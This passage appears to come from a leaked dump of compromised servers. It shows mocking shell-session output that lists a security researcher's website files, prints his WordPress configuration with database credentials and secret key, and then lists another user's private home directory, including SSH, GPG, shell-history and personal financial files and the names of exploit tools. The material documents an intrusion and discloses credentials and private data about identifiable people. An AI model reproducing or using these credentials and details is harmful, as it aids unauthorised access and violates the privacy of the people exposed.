-rw-r--r--    1 effugas  effugas         99 Jul  3  2008 video.gif
-rw-r--r--    1 effugas  effugas       2372 Feb 28  2008 video.png
drwxr-xr-x    5 effugas  effugas        512 Sep 23  2008 vidsim
-rw-r--r--    1 effugas  effugas        630 Feb  2  2006 violins.asx
-rw-r--r--    1 effugas  effugas        672 Feb  2  2006 violins.smi
-rw-r--r--    1 effugas  effugas       5228 Feb  2  2006 vml.html
-rw-r--r--    1 effugas  effugas       1165 Feb  2  2006 vml2.html
-rw-r--r--    1 effugas  effugas       1178 Feb  2  2006 vml3.html
-rw-r--r--    1 effugas  effugas    1641642 Feb  8  2005 voicemail.mp3
drwxr-xr-x    2 effugas  effugas        512 Nov 15  2002 vol
-rw-r--r--    1 effugas  effugas     106130 Dec 14  2004 w32dns.zip
-rw-r--r--    1 effugas  effugas     763750 Nov  9  2006 walter.zip
-rw-r--r--    1 effugas  effugas        141 Nov 18  2006 warning.html
-rw-r--r--    1 effugas  effugas       3594 Aug 18  2006 wash_your_mouth_out_with_soap.html
-rw-r--r--    1 effugas  effugas        424 Nov 14  2002 webcache.html
-rw-r--r--    1 effugas  effugas     210717 Mar 26  2003 weilsigs.pdf
-rw-r--r--    1 effugas  effugas     452841 Feb 25  2003 weilsigs.ps
drwxr-xr-x    2 effugas  effugas        512 Jun  7  2004 whoa
-rw-r--r--    1 effugas  effugas      33721 Jun  5  2007 why_you_do_this.jpg
-rw-r--r--    1 effugas  effugas       1027 May 20  2008 widgets-rtl.css
-rw-r--r--    1 effugas  effugas       3211 May 21  2008 widgets.css
-rw-r--r--    1 effugas  effugas       4704 May  3  2008 widgets.js
-rw-r--r--    1 effugas  effugas       9986 Jul  4  2008 widgets.php
-rw-r--r--    1 effugas  effugas      81546 Nov 14  2002 win_ie6.png
-rw-r--r--    1 effugas  effugas      72482 Nov 14  2002 win_moz11.png
-rw-r--r--    1 effugas  effugas       7068 Apr 14  2008 window.css
-rw-r--r--    1 effugas  effugas        415 Jan 17  2008 windowsmedia.gif
-rw-r--r--    1 effugas  effugas      48738 Sep 19  2002 wire_1.0.pdf
-rw-r--r--    1 effugas  effugas      64587 Dec 12  2002 wire_1.1.pdf
-rw-r--r--    1 effugas  effugas      53316 Feb 11  2001 wires.jpg
-rw-r--r--    1 effugas  effugas         46 Jan 17  2008 wline.gif
drwxr-xr-x    2 effugas  effugas        512 Jul 15  2008 wlw
-rw-r--r--    1 effugas  effugas       1013 Oct  8  2007 wlwmanifest.xml
-rw-r--r--    1 effugas  effugas        967 Jun  3  2008 word-count.js
-rw-r--r--    1 effugas  effugas        162 Jan 29  2006 word.html
drwxr-xr-x    5 effugas  effugas       1024 Aug 19  2008 wordpress
-rw-r--r--    1 effugas  effugas    1302795 Aug 19  2008 wordpress-2.6.tar.gz
-rw-r--r--    1 effugas  effugas       2334 Feb 18  2008 wordpress-logo.png
-rw-r--r--    1 effugas  effugas       1475 Jul 11  2008 wordpress.css
-rw-r--r--    1 effugas  effugas      24049 May 20  2008 wordpress.php
-rw-r--r--    1 effugas  effugas      91190 Sep  3  2006 workout.png
drwxr-xrwx    7 effugas  effugas       1024 Sep 26  2005 wp
drwxr-xr-x    7 effugas  effugas       2048 Aug 24  2008 wp-admin
-rw-r--r--    1 effugas  effugas      25511 Jul 10  2008 wp-admin.css
-rw-r--r--    1 effugas  effugas       2921 Mar 20  2008 wp-ajax-response.js
-rw-r--r--    1 effugas  effugas      34072 Aug 24  2008 wp-app.php
-rw-r--r--    1 effugas  effugas        555 Aug 24  2008 wp-atom.php
-rw-r--r--    1 effugas  effugas        274 Aug 24  2008 wp-blog-header.php
-rw-r--r--    1 effugas  effugas      16961 Jul  7  2008 wp-cat2tag.php
-rw-r--r--    1 effugas  effugas       3091 Aug 24  2008 wp-comments-post.php
-rw-r--r--    1 effugas  effugas       1442 Oct  8  2007 wp-comments.png
-rw-r--r--    1 effugas  effugas        625 Aug 24  2008 wp-commentsrss2.php
-rw-r--r--    1 effugas  effugas       1569 Aug 24  2008 wp-config-sample.php
-rw-r--r--    1 effugas  effugas       1374 Aug 24  2008 wp-config.php
drwxr-xr-x    6 effugas  effugas        512 Aug 24  2008 wp-content
-rw-r--r--    1 effugas  effugas       1257 Aug 24  2008 wp-cron.php
-rw-r--r--    1 effugas  effugas      24346 Jul 10  2008 wp-db.php
-rw-r--r--    1 effugas  effugas      10111 Jul  6  2008 wp-diff.php
-rw-r--r--    1 effugas  effugas        661 Aug 24  2008 wp-feed.php
-rw-r--r--    1 effugas  effugas       2396 May 19  2008 wp-gears.js
-rw-r--r--    1 effugas  effugas        779 Oct  8  2007 wp-icon.png
drwxr-xr-x    5 effugas  effugas       2048 Aug 24  2008 wp-includes
-rw-r--r--    1 effugas  effugas      22612 Jul 10  2008 wp-langs.php
-rw-r--r--    1 effugas  effugas       1986 Aug 24  2008 wp-links-opml.php
-rw-r--r--    1 effugas  effugas      11635 Apr 14  2008 wp-lists.js
-rw-r--r--    1 effugas  effugas       1950 Aug 24  2008 wp-load.php
-rw-r--r--    1 effugas  effugas      19219 Aug 24  2008 wp-login.php
-rw-r--r--    1 effugas  effugas       6404 Aug 24  2008 wp-mail.php
-rw-r--r--    1 effugas  effugas      12566 Jun 27  2008 wp-mce-help.php
-rw-r--r--    1 effugas  effugas        487 Aug 24  2008 wp-pass.php
-rw-r--r--    1 effugas  effugas        473 Aug 24  2008 wp-rdf.php
-rw-r--r--    1 effugas  effugas        316 Aug 24  2008 wp-register.php
-rw-r--r--    1 effugas  effugas        484 Aug 24  2008 wp-rss.php
-rw-r--r--    1 effugas  effugas        555 Aug 24  2008 wp-rss2.php
-rw-r--r--    1 effugas  effugas       2617 Mar  2  2008 wp-scriptaculous.js
-rw-r--r--    1 effugas  effugas      17172 Aug 24  2008 wp-settings.php
drwxr-xr-x    3 effugas  effugas        512 Jul 24  2008 wp-super-cache
-rw-r--r--    1 effugas  effugas      29906 Jul  8  2008 wp-super-cache.0.6.4.zip
-rw-r--r--    1 effugas  effugas      31102 Jul 24  2008 wp-super-cache.0.6.5.zip
-rw-r--r--    1 effugas  effugas       3434 Aug 24  2008 wp-trackback.php
-rw-r--r--    1 effugas  effugas       8280 Oct  8  2007 wp-watermark.png
drwxr-xr-x    3 effugas  effugas        512 Aug 19  2008 wp_theme
drwxr-xr-x    5 effugas  effugas        512 Aug 19  2008 wpeditimage
-rw-r--r--    1 effugas  effugas         65 Apr  1  2007 wpf.html
drwxr-xr-x    9 effugas  effugas        512 Mar 16  2005 writings
drwxr-xr-x    6 effugas  effugas        512 Oct 17  2005 wtf
-rw-r--r--    1 effugas  effugas        986 Nov 14  2002 wtf.html
-rwxr-xr-x    1 effugas  effugas      14529 Sep 26  2005 wtf.log
drwxr-xr-x    2 effugas  effugas        512 Apr  2  2006 wtf2
drwxr-xr-x    2 effugas  effugas        512 Oct 12  2005 x
drwxr-xr-x    5 effugas  effugas       1024 Jan 21  2002 x10
-rw-r--r--    1 effugas  effugas       2231 Apr 18  2008 xdiff.php
-rw-r--r--    1 effugas  effugas       1293 Jun  1  2007 xfn.js
-rw-r--r--    1 effugas  effugas        181 Jan  2  2008 xit.gif
-rw-r--r--    1 effugas  effugas      75403 Aug 24  2008 xmlrpc.php
drwxr-xr-x    2 effugas  effugas        512 Dec 28  2005 xovi
-rw-r--r--    1 effugas  effugas        586 Feb 20 08:16 xqid.txt
-rw-r--r--    1 effugas  effugas        187 Feb  1  2006 yack.html
-rwxr-xr-x    1 effugas  effugas    2566180 Nov 24  2005 yed.jar
-rwxrwxrwx    1 effugas  effugas    9041858 Aug  6  2008 yellow-7days-with-percentage.avi
-rw-r--r--    1 effugas  effugas        612 Jul  9  2008 yes.png
-rw-r--r--    1 effugas  effugas    4463377 Aug  8  2006 zelda32.png
-rw-r--r--    1 effugas  effugas      29121 Dec  8  2003 zen.html
-rw-r--r--    1 effugas  effugas      14631 Dec  8  2003 zen.txt
-rw-r--r--    1 effugas  effugas       1270 Feb 21  2008 zip.png
-rw-r--r--    1 effugas  effugas         86 Feb  6  2006 zippo2.html
-rw-r--r--    1 effugas  effugas     923947 Nov  4  2008 zombie2.swf
-rw-r--r--    1 effugas  effugas        673 Nov  4  2008 zombie2.swf.html


// Here comes some leet PHP that looks so old school it probably predates PHP
$ cat index_old.php
<?php
	$title = "Welcome to Doxpara Research!";
	require('layout.inc');
	$DOCUMENT_ROOT="/home/effugas/doxpara";

	$fp = fopen($DOCUMENT_ROOT."/Frontpage_old","r");
	while($title = fgetss($fp, 70)){
		$URL = fgetss($fp, 100);
		$URL = chop($URL);
		$date = fgetss($fp, 50);		
		$desc = "";
		while($line = fgets($fp, 4096)){
			if(strlen($line) < 2){
				break;
			}
			$desc .= $line;
		}
	?>

<!-- BOUNDARY -->

<tr><td><img src="/clearpixel.gif" height=10 width=2></td></tr>

<tr><td><table width=100% border=0 cellpadding=0 cellspacing=0>
<tr><td bgcolor=#000090><font color=white face=garamond,arial,helvetica,sans-serif 
color=#e0e0e0><?php echo $date; ?></a> / <a href="mailto:dan@doxpara.com">
<font color=white>Dan "Effugas" Kaminsky</font></a></font></td>
<td bgcolor=#000090 align=right>
<?php if($URL){ echo "<a href=\"$URL\">"; } ?><font face=arial,sans-serif,helvetica
 color=white size=+2><?php echo $title; ?></font><?php if($URL){ echo "</a>"; } ?></td></tr>
</table></td></tr>
<tr><td bgcolor=#c0c0c0><font face=arial,sans-serif,helvetica size=-1>
<blockquote>
<div align=justify>
<?php echo $desc;?>
</div>
</td></tr>

<?php
	}
	fclose($fp);

	require('layout-tail.inc');
?>
$ cat wp-config.php
<?php
// ** MySQL settings ** //
define('DB_NAME', 'effugas');    // The name of the database
define('DB_USER', 'effugas');     // Your MySQL username
define('DB_PASSWORD', 'foo'); // ...and password
define('DB_HOST', 'localhost');    // 99% chance you won't need to change this value
define('DB_CHARSET', 'utf8');
define('DB_COLLATE', '');

// Change SECRET_KEY to a unique phrase.  You won't have to remember it later,
// so make it long and complicated.  You can visit http://api.wordpress.org/secret-key/1.0/
// to get a secret key generated for you, or just make something up.
define('SECRET_KEY', 'kjfhgdkfjghldkfjghlkdfjghlkdfjghkljdfghkljdfhgkldjfghkldfjghlkdfjghkdfljhgdlkjfhgkldjfghkldfjhgkdljfhdfg'); // Change this to a unique phrase.

// You can have multiple installations in one database if you give each a unique prefix
$table_prefix  = 'wp_';   // Only numbers, letters, and underscores please!

// Change this to localize WordPress.  A corresponding MO file for the
// chosen language must be installed to wp-content/languages.
// For example, install de.mo to wp-content/languages and set WPLANG to 'de'
// to enable German language support.
define ('WPLANG', '');

/* That's all, stop editing! Happy blogging. */

define('ABSPATH', dirname(__FILE__).'/');
define('WP_CACHE', true);
require_once(ABSPATH.'wp-settings.php');
?>
$ cd /home/thalakan
$ ls -la
total 7102326
-rw-r--r--    1 thalakan  thalakan      105677 Nov  1  2004 OAgOA
-rw-r--r--    1 thalakan  thalakan           1 Nov  2  2007 #64014#
-rw-r--r--    1 thalakan  thalakan        1025 Nov 20  2004 #align.c#
-rwxr-xr-x    1 thalakan  thalakan        3644 Oct 22  2008 #automat.py#
-rw-r--r--    1 thalakan  thalakan          20 May  5  2005 #c1.pl#
-rw-r--r--    1 thalakan  thalakan           0 Mar  7  2007 #commute.txt#
-rw-r--r--    1 thalakan  thalakan          34 Mar  4 12:40 #hsqualgm.txt#
-rw-r--r--    1 thalakan  thalakan          19 Nov 27  2006 #test.awk#
-rw-r--r--    1 thalakan  thalakan         206 May  3  2006 #test22.c#
-rwxrwxrwx    1 thalakan  thalakan        2675 Nov 15  2005 %backup%~
drwxr-x---  141 thalakan  thalakan       26112 Jul 20 09:10 .
lrwxr-xr-x    1 thalakan  thalakan          54 Mar  4 12:38 .#hsqualgm.txt -> thalakan@shaitan1.lightconsulting.com.49893:1201029435
drwxr-xr-x   73 root      wheel           1536 Jun 26 04:56 ..
-rw-r--r--    1 thalakan  thalakan        1527 May 21  2003 ..\homework7\homework7.zip
drwx------    3 thalakan  thalakan         512 Apr 21  2006 .BitchX
drwxr-xr-x    8 thalakan  thalakan         512 Dec 11  2004 .Mathematica
-rw-------    1 thalakan  thalakan          53 Jul  5  2007 .Xauthority
-rw-------    1 thalakan  thalakan          24 Dec  7  2008 .aspell.en.prepl
-rw-------    1 thalakan  thalakan          22 Dec  7  2008 .aspell.en.pws
-rw-------    1 thalakan  thalakan        9368 Jun 26 04:54 .bash_history
-rw-r--r--    1 thalakan  thalakan          46 Sep  8  2003 .bitchxrc
-rw-r--r--    1 thalakan  thalakan         820 Jun 22  2006 .cshrc
-rw-------    1 thalakan  thalakan          53 Aug 26  2005 .cvspass
lrwxr-xr-x    1 root      wheel             18 Jan 24  2002 .emacs -> jrstools/dot-emacs
drwx------    3 thalakan  thalakan         512 Jan 25  2002 .emacs.d
drwx------    2 thalakan  thalakan         512 Jan 28  2008 .eshell
-rw-r--r--    1 thalakan  thalakan         683 Mar 17  2005 .fonts.cache-1
-rw-r--r--    1 thalakan  thalakan          98 Jan 24  2002 .forward.off
drwx------    3 thalakan  thalakan         512 Mar  3  2005 .gaim
drwx------    3 thalakan  thalakan         512 Mar  3  2005 .gconf
drwx------    2 thalakan  thalakan         512 Mar  3  2005 .gconfd
drwx------    2 thalakan  thalakan         512 Mar  3  2005 .gnome
drwx------    3 thalakan  thalakan         512 Mar  3  2005 .gnome2
drwx------    2 thalakan  thalakan         512 Mar  3  2005 .gnome2_private
drwx------    2 thalakan  thalakan         512 Jun  4 11:16 .gnupg
-rw-------    1 thalakan  thalakan      137061 Jul 18 23:44 .history
-rw-r--r--    1 thalakan  thalakan          17 Jun 20  2007 .htaccess
-rw-r--r--    1 thalakan  thalakan        1949 Apr 18  2006 .htcfg
drwxr-xr-x    2 thalakan  thalakan         512 Mar  4  2005 .idapro
drwx------    3 thalakan  thalakan         512 May 26  2008 .irssi
-rw-------    1 thalakan  thalakan         326 Nov 14  2002 .ispell_english
drwx------    2 thalakan  thalakan         512 Jul 26  2006 .john
drwx------    2 thalakan  thalakan         512 Jan 30  2004 .keychain
-rw-------    1 thalakan  thalakan         922 Jul 17 12:58 .lesshst
drwx------    2 thalakan  thalakan         512 Jun  4 01:09 .links
-rw-r--r--    1 thalakan  thalakan         255 Jan 24  2002 .login
-rw-r--r--    1 thalakan  thalakan         160 Jan 24  2002 .login_conf
drwx------    3 thalakan  thalakan         512 Jan 24  2002 .loki
drwx------    3 thalakan  thalakan         512 Jan 24  2002 .loki.bak
-rw-------    1 thalakan  thalakan       17238 Dec 12  2004 .lsof_shaitan
-rw-------    1 thalakan  thalakan         371 Jan 24  2002 .mail_aliases
-rw-r--r--    1 thalakan  thalakan          32 Sep 24  2002 .mailcap
-rw-r--r--    1 thalakan  thalakan         331 Jan 24  2002 .mailrc
-rw-r--r--    1 thalakan  thalakan        8750 Jul 15  2005 .mairixrc
drwxr-xr-x    3 thalakan  thalakan         512 Feb 21  2005 .mozilla
drwx------    2 thalakan  thalakan         512 Mar 26  2005 .msf
drwx------    2 thalakan  thalakan         512 Sep 20  2002 .mutella
drwxr-xr-x    2 thalakan  thalakan         512 Dec  3  2006 .muttcache
lrwxr-xr-x    1 thalakan  wheel             19 Jan 24  2002 .muttrc -> jrstools/dot-muttrc
-rw-r--r--    1 thalakan  thalakan           0 Jan 24  2002 .muttrc-local
-rw-------    1 thalakan  thalakan       22736 Feb 22 19:04 .mysql_history
-rw-------    1 thalakan  thalakan        9010 Dec 12  2004 .nessusrc
drwxr-xr-x    3 thalakan  thalakan         512 Apr 14  2006 .paypal.com
-rw-r--r--    1 thalakan  thalakan        1369 Sep 11  2007 .plan
-rw-r--r--    1 thalakan  thalakan        1348 Dec 19  2002 .plan~
lrwxr-xr-x    1 root      wheel             23 Jan 24  2002 .procmailrc -> jrstools/dot-procmailrc
-rw-r--r--    1 thalakan  thalakan         789 Jan 24  2002 .profile
drwx------    2 thalakan  thalakan        1024 Sep 28  2007 .razor
-rw-r--r--    1 thalakan  thalakan          15 Mar 10  2003 .razor.lst
-rw-------    1 thalakan  thalakan         276 Jan 24  2002 .rhosts
-rw-------    1 root      thalakan        1024 Dec 12  2004 .rnd
-rw-------    1 thalakan  thalakan         385 Jul  2  2002 .rpmmacros
-rw-------    1 thalakan  thalakan          52 Jan 24  2002 .saves-1970-shaitan.lightconsulting.com~
-rw-r--r--    1 thalakan  thalakan          52 Jan 24  2002 .saves-54194-shaitan.lightconsulting.com~
-rw-r--r--    1 thalakan  thalakan         184 Jan 24  2002 .saves-68458-shaitan.lightconsulting.com~
-rw-r--r--    1 thalakan  thalakan          60 Jan 24  2002 .saves-68837-shaitan.lightconsulting.com~
-rw-r--r--    1 thalakan  thalakan         264 Jan 24  2002 .saves-68878-shaitan.lightconsulting.com~
lrwxr-xr-x    1 thalakan  thalakan          21 Sep 15  2007 .screenrc -> jrstools/dot-screenrc
drwx------    2 thalakan  thalakan         512 Aug 22  2008 .seraph
-rw-r--r--    1 thalakan  thalakan         852 Jan 24  2002 .shrc
drwx------    2 thalakan  thalakan        4608 Jul 20 09:10 .spamassassin
drwx------    2 thalakan  thalakan         512 Jan 27 17:20 .ssh
drwxr-x---    2 thalakan  thalakan         512 Dec  1  2004 .steam
drwxr-xr-x    3 thalakan  thalakan         512 May  1  2007 .subversion
lrwxr-xr-x    1 root      wheel             19 Jan 24  2002 .tcshrc -> jrstools/dot-tcshrc
-rw-r--r--    1 thalakan  thalakan           4 Feb 17  2004 .total
drwx------    3 thalakan  thalakan         512 Dec 29  2002 .ut2003
-rw-r--r--    1 thalakan  thalakan          44 Jan 24  2002 .wgetrc
-rw-r--r--    1 thalakan  thalakan      126736 May 19  2005 00000000.pgm
-rwxr--r--    1 thalakan  thalakan        3868 Dec 12  2002 03292002-Invoice.html
-rw-r--r--    1 thalakan  thalakan      128630 Dec 12  2005 10 AccessMaster.exe
-rw-r--r--    1 thalakan  thalakan      801268 Sep 21  2005 100_0007.JPG
-rw-r--r--    1 thalakan  thalakan      345209 Aug 14  2002 100bnew.pdf
drwxr-xr-x    6 thalakan  thalakan        3072 Feb  7 13:57 100mget
-rw-r--r--    1 thalakan  thalakan      563004 Oct  5  2008 1223193846115.jpg
-rw-r--r--    1 thalakan  thalakan       28071 Jan 31 15:49 1233445783792.jpg
-rw-r--r--    1 thalakan  thalakan      845637 Jan 18  2007 1700n.tar.gz
-rw-r--r--    1 thalakan  thalakan     6655649 Dec 29  2008 2fyurarftnr6xzux3kjd.pdf
-rw-r--r--    1 root      thalakan    10055100 Nov 15  2005 31337.cap
-rw-r--r--    1 thalakan  thalakan           0 Aug 26  2005 31337.log
-rw-r--r--    1 thalakan  thalakan      932986 Jul 20  2002 328cf0b1.bin
-rw-r--r--    1 thalakan  thalakan       18588 Mar 11  2002 486-config
-rw-------    1 thalakan  thalakan      133234 May  2 08:07 5
-rw-r--r--    1 thalakan  thalakan         208 Jul 14 11:19 67.78.151.157.scan
-rw-r--r--    1 thalakan  thalakan      105797 May  3  2002 7200-config
-rw-r--r--    1 thalakan  thalakan        2374 Feb  2  2003 79R5HJ.tmj
-rw-r--r--    1 thalakan  thalakan       80896 Aug  5  2002 BOPIF.DOC
-rw-r--r--    1 thalakan  thalakan        2924 Feb 12  2002 BayonneMon.java
-rw-r--r--    1 thalakan  thalakan    33433328 Dec  2  2008 C815-IPB.BIN
-rw-r--r--    1 thalakan  thalakan      234855 May 30  2002 CMD.EXE
-rw-r--r--    1 thalakan  thalakan          35 Jul 30  2006 CONTINGENCY.TXT
drwxr-xr-x    5 thalakan  thalakan         512 Apr 23  2003 CarWash
-rw-r--r--    1 thalakan  thalakan         349 Apr  6  2003 ChanceCategoryClass.java
-rw-r--r--    1 thalakan  thalakan      129024 Jun 21  2002 Credit Application.doc
-rw-r--r--    1 thalakan  thalakan      305632 Dec 14  2004 DF5Serv.exe
-rw-r--r--    1 thalakan  thalakan      378282 Mar 19  2002 DesigningStaticDialPlan.pdf
-rw-r--r--    1 thalakan  thalakan       13415 Sep  7  2004 DiffPlot.nb
-rw-r--r--    1 thalakan  thalakan         123 Apr  6  2003 DummyTurn.java
-rw-------    1 thalakan  thalakan        1703 Dec 19  2002 Eddie Lee.asc
-rw-r--r--    1 thalakan  thalakan        1805 Mar  1  2002 Eterm
-rw-r--r--    1 thalakan  thalakan        1805 Mar  1  2002 Eterm-color
-rw-r--r--    1 thalakan  thalakan         935 Mar  1  2002 Eterm.tcap
-rw-r--r--    1 thalakan  thalakan       85504 Dec  9  2006 Final Report.doc
drwxr-xr-x    2 thalakan  thalakan         512 Dec 13  2004 FoToZ_JPEG
-rw-r--r--    1 thalakan  thalakan      336864 Sep  6  2005 Folders.dbx
-rw-r--r--    1 thalakan  thalakan      352676 Dec 14  2004 FrzState2k.exe
-rw-r--r--    1 thalakan  thalakan         877 Apr  6  2003 FullHouseCategoryClass.java
-rw-r--r--    1 thalakan  thalakan      184769 Mar 19  2002 GKTMP-how.pdf
-rwxr--r--    1 thalakan  thalakan        4314 Mar  7  2003 Game.java
-rw-r--r--    1 thalakan  thalakan        1864 Jun 14 20:47 GroupVPN_00401012CD94.rcf
-rw-------    1 thalakan  thalakan      187366 Nov 17  2002 IEEEtran.cls
-rw-r--r--    1 thalakan  thalakan        3326 May  9  2006 IN_CASE_OF_DEATH.gpg
-rw-------    1 thalakan  thalakan       12420 Mar  2  2004 Info.zip
-rwxr-xr-x    1 thalakan  thalakan      136537 Oct 24  2002 Installation Report.pdf
-rw-r--r--    1 thalakan  thalakan         888 Nov 17  2004 Joke-notes.txt
-rw-------    1 thalakan  thalakan       18853 Nov 17  2004 Joke.exe
-rw-r--r--    1 thalakan  thalakan        2358 Feb 21  2003 JsAppPower.java
-rwxr--r--    1 thalakan  thalakan        1377 Feb  7  2003 JsFactorial.java
-rw-r--r--    1 thalakan  thalakan        2613 Feb 21  2003 JsUniqueNumber.java
drwxr-xr-x    2 thalakan  thalakan         512 Feb 26  2003 LinkedArray
drwxr-xr-x    2 thalakan  thalakan         512 Jan 26  2005 MATH-101C
drwxr-xr-x    2 thalakan  thalakan         512 Feb 24  2005 MATH-103
-rw-r--r--    1 thalakan  thalakan       13185 Feb 24  2005 MATH-103.nb
-rw-r--r--    1 thalakan  thalakan       98057 Jul 24  2006 MBS.zip
drwx------    3 thalakan  thalakan         512 Jul 15  2005 Mail
drwx------    2 thalakan  thalakan         512 Jan 24  2002 Mail.bak
drwxr-xr-x   71 thalakan  thalakan        2048 Nov 19  2008 Maildir
-rw-r--r--    1 thalakan  thalakan         998 Apr  6  2005 Makefile
-rw-r--r--    1 thalakan  thalakan         954 Jan 18  2005 Makefile~
-rw-------    1 thalakan  thalakan      207378 Aug 12  2002 Modbin6.exe
-rw-r--r--    1 thalakan  thalakan         275 Apr  6  2003 OAKTest.java
-rw-r--r--    1 thalakan  thalakan        1251 Apr  6  2003 OfAKindCategory.java
-rw-r--r--    1 thalakan  thalakan       20337 Jan 31  2005 Oops.nb
-rw-r--r--    1 thalakan  thalakan     3952640 Nov  1  2004 OpenBIOS-0.99.1.tar
-rwxr-xr-x    1 thalakan  thalakan       83839 Dec 13  2004 OpenFuck
-rw-r--r--    1 thalakan  thalakan       33244 Mar 14  2003 OpenFuck.c
-rw-r--r--    1 thalakan  thalakan       30385 Dec 13  2004 OpenFuck.c~
-rw-r--r--    1 thalakan  thalakan      515854 Feb 28  2002 PANA0005.JPG
-rw-r--r--    1 thalakan  thalakan      495396 Feb 28  2002 PANA0006.JPG
-rw-r--r--    1 thalakan  thalakan      513892 Feb 28  2002 PANA0007.JPG
-rwxr-xr-x    1 thalakan  thalakan       13651 Oct 24  2002 PBX400 Administrator Quick Reference.pdf
drwxr-xr-x    2 thalakan  thalakan         512 Jan 26  2005 PHYS-141
-rw-r--r--    1 thalakan  thalakan       22686 Apr 17 15:37 PWC_2708_16_24Boot-8.bin
drwxr-xr-x    2 thalakan  thalakan         512 Feb 26  2003 Palindrome
-rw-------    1 thalakan  thalakan      243945 Jul  4  2004 Part14.zip
-rwxr--r--    1 thalakan  thalakan        5199 Mar  7  2003 Player.java
-rw-r--r--    1 thalakan  thalakan         210 Apr  6  2003 PlayerCountException.java
-rw-r--r--    1 thalakan  thalakan      773989 Apr 17 15:31 PowerConnect_2716_24-1017.bin
-rw-r--r--    1 thalakan  thalakan           0 Apr  2  2004 Preliminary Works Cited Page.doc
-rw-r--r--    1 thalakan  thalakan       22528 Dec  9  2004 Presentation1.ppt
-rw-r--r--    1 thalakan  thalakan      953704 Sep 22  2008 Q815485_WXP_SP2_x86_ENU.exe
-rw-r--r--    1 thalakan  thalakan      117248 Aug  7  2002 RACK-210_R3705.doc
-rw-r--r--    1 thalakan  thalakan      157184 Jun 26  2002 RACK-2300 B-TEST.doc
-rw-r--r--    1 thalakan  thalakan      117760 Aug  7  2002 RACK-2330_R3705.doc
-rw-r--r--    1 thalakan  thalakan         916 Jun  5  2002 RAID-RECOVERY-HOWTO
-rw-r--r--    1 thalakan  thalakan       18902 Nov 22  2006 RATIONALE
-rw-rw-rw-    1 thalakan  thalakan        1293 Jan  5  2004 README.TXT
-rw-r--r--    1 thalakan  thalakan        2789 Nov 22  2006 README_C
-rw-r--r--    1 thalakan  thalakan      149504 Jun 26  2002 ROCKY-3705EV-B.doc
drwxr-xr-x    2 thalakan  thalakan         512 Mar  9  2008 SDL_iphone
-rw-r--r--    1 thalakan  thalakan        4205 Mar  9  2008 SDL_iphone.tar.gz
-rw-------    1 thalakan  thalakan     1215348 Jul  4  2004 STDpart14.zip
-rw-------    1 thalakan  thalakan     2520433 Feb 14  2006 STDpart35.zip
-rw-------    1 thalakan  thalakan     3042154 Apr  9  2006 STDpart36.zip
-rw-r--r--    1 thalakan  thalakan         547 Apr  6  2003 ScoringCategory.java
-rw-r--r--    1 thalakan  thalakan        3227 Apr  6  2003 ScoringCategoryTest.java
-rwxr--r--    1 thalakan  thalakan        3494 May 21  2003 Script1.rc
-rwx------    1 thalakan  thalakan      349629 Mar  9  2005 Section 11.nb
-rw-r--r--    1 thalakan  thalakan         846 Apr  6  2003 SimpleNumberCategory.java
-rw-r--r--    1 thalakan  thalakan    16472603 Jul 27  2005 StudentWorkbook.pdf
-rw-r--r--    1 thalakan  thalakan        3955 Feb  1  2005 THQ2.nb
-rw-r--r--    1 thalakan  thalakan         135 Mar 27  2008 TODO
-rw-------    1 thalakan  thalakan        2999 Feb 19  2002 TeleRunner Specification Document.txt
-rw-------    1 thalakan  thalakan        2990 Feb 19  2002 TeleRunner Specification Document.txt~
-rw-------    1 thalakan  thalakan     1916333 Jan 31  2002 The Man Show Boy Bee-1.WMV
-rwxr--r--    1 thalakan  thalakan         153 Mar  7  2003 Turn.html
-rwxr--r--    1 thalakan  thalakan        6570 Mar  7  2003 Turn.java
-rw-r--r--    1 thalakan  thalakan       14052 Jan  5  2006 UTF-8-demo.txt
drwxr-xr-x    4 thalakan  thalakan         512 Dec 11  2004 Unix
-rw-r--r--    1 thalakan  thalakan    97012008 Dec 11  2004 Unix.zip
-rw-r--r--    1 thalakan  thalakan        8385 Oct 28  2005 Untitled-2.pdf
-rwxr-xr-x    1 thalakan  thalakan     1081792 Jul 13  2006 Update.to.flapjack2.4.0.17@OS
-rw-r--r--    1 thalakan  thalakan        8652 Nov 22  2006 VARIATIONS
-rw-r--r--    1 thalakan  thalakan      911838 Aug 28  2003 VMA_make_out.mpg
-rw-r--r--    1 thalakan  thalakan        5585 Jul 12  2005 a.asm
-rwxr-xr-x    1 thalakan  thalakan         379 Sep  3  2005 a.out
-rw-------    1 thalakan  thalakan      331776 Dec  7  2004 a.out.core
-rw-r--r--    1 thalakan  thalakan       30258 Sep 27  2002 abul-invoice1.rtf
-rw-r--r--    1 thalakan  thalakan       30258 Sep 27  2002 abul-invoice2.rtf
-rwxr-xr-x    1 thalakan  thalakan       26894 Nov  1  2004 ac
-rw-r--r--    1 thalakan  thalakan       15660 Nov  1  2004 ac.c
-rw-r--r--    1 thalakan  thalakan       17245 Dec 10  2004 ac.js
-rw-------    1 thalakan  thalakan       11310 Dec 10  2004 ac.js.BAK
-rw-r--r--    1 thalakan  thalakan       11298 Dec  9  2004 ac.js~
-rw-r--r--    1 thalakan  thalakan       18392 Oct 22  2004 adcb8e448441f72180f7a04827188e13
-rw-r--r--    1 thalakan  thalakan         769 Jun 15  2004 addresses
-rwxr-xr-x    1 thalakan  thalakan        4295 Oct 21  2004 addrinfo_size
-rw-r--r--    1 thalakan  thalakan         111 Oct 21  2004 addrinfo_size.c
-rw-r--r--    1 thalakan  thalakan          31 May  4  2006 admin-wireless.sh
-rw-------    1 thalakan  thalakan       31232 Nov  5  2008 adobe_flash9.exe
-rw-r--r--    1 thalakan  thalakan        4365 Nov  6  2005 adv-world.scm
-rw-r--r--    1 thalakan  thalakan        8555 Nov  6  2006 adv.scm
-rw-r--r--    1 thalakan  thalakan     1505102 Feb  8 17:44 aldkjadsklj.DAT
-rw-r--r--    1 thalakan  thalakan        1051 Nov 20  2004 align.c
-rw-r--r--    1 thalakan  thalakan         789 Nov 20  2004 align.c~
-rw-r--r--    1 thalakan  thalakan     8839452 Nov 19  2002 all.cap
drwxr-xr-x    6 thalakan  thalakan        1024 Nov 29  2005 am
-rw-r--r--    1 thalakan  thalakan       31759 Jun  6  2004 antz.zip
-rwxr-xr-x    1 thalakan  thalakan       10520 Jun 20  2002 apache-scalp
-rw-------    1 thalakan  thalakan       10811 Jun 20  2002 apache-scalp.c
-rw-r--r--    1 thalakan  thalakan      163840 Dec 14  2004 arcsetup.exe
-rwxr-xr-x    1 thalakan  thalakan        1131 Jan  9  2005 asfdump.pl
-rw-r--r--    1 thalakan  thalakan         209 Jan  9  2005 asfdump.pl~
